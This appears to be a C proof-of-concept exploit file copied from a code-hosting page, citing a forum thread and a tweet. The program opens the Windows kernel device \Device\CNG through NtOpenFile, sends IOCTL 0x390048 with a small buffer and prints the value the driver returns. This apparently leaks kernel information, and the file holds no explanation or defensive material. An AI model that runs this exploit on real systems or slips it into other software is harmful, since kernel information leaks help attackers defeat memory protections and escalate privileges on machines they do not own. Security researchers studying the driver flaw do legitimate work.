62 lines
No EOL
2 KiB
C
62 lines
No EOL
2 KiB
C
// Source: http://www.binvul.com/viewthread.php?tid=508
|
|
// Source: https://twitter.com/NTarakanov/status/598370525132423168
|
|
|
|
|
|
#include <windows.h>
|
|
#include <winternl.h>
|
|
#include <stdio.h>
|
|
#pragma comment(lib, "ntdll.lib")
|
|
|
|
|
|
|
|
int main(int argc, CHAR* argv[]) {
|
|
typedef NTSTATUS (__stdcall *NT_OPEN_FILE)(OUT PHANDLE FileHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, OUT PIO_STATUS_BLOCK IoStatusBlock, IN ULONG ShareAccess, IN ULONG OpenOptions);
|
|
NT_OPEN_FILE NtOpenFileStruct;
|
|
|
|
PVOID Info;
|
|
HMODULE hModule = LoadLibrary(("ntdll.dll"));
|
|
NtOpenFileStruct = (NT_OPEN_FILE)GetProcAddress(hModule, "NtOpenFile");
|
|
if(NtOpenFileStruct == NULL) {
|
|
exit(-1);
|
|
}
|
|
|
|
|
|
|
|
UNICODE_STRING filename;
|
|
RtlInitUnicodeString(&filename, L"\\Device\\CNG");
|
|
|
|
|
|
OBJECT_ATTRIBUTES obja;
|
|
obja.Attributes = 0x40;
|
|
obja.ObjectName = &filename;
|
|
obja.Length = 0x18;
|
|
obja.RootDirectory = NULL;
|
|
obja.SecurityDescriptor = NULL;
|
|
obja.SecurityQualityOfService = NULL;
|
|
|
|
IO_STATUS_BLOCK iostatusblock;
|
|
HANDLE hCNG = NULL;
|
|
NTSTATUS stat = NtOpenFileStruct(&hCNG, 0x100001, &obja, &iostatusblock, 7, 0x20);
|
|
if(NT_SUCCESS(stat)) {
|
|
printf("File successfully opened.\n");
|
|
}
|
|
else {
|
|
printf("File could not be opened.\n");
|
|
return -1;
|
|
}
|
|
DWORD dwBuffer = 0;
|
|
DWORD dwCnt = 0;
|
|
BOOL bRet = DeviceIoControl((HANDLE)hCNG, 0x390048, &dwBuffer, 4, &dwBuffer, 4, &dwCnt, NULL);
|
|
if (FALSE == bRet)
|
|
{
|
|
printf("[*]Send IOCTL fail!\n");
|
|
printf("[*]Error Code:%d\n", GetLastError());
|
|
}
|
|
else
|
|
{
|
|
printf("[*]0x%08x\n", dwBuffer);
|
|
}
|
|
CloseHandle(hCNG);
|
|
getchar();
|
|
return 0;
|
|
} |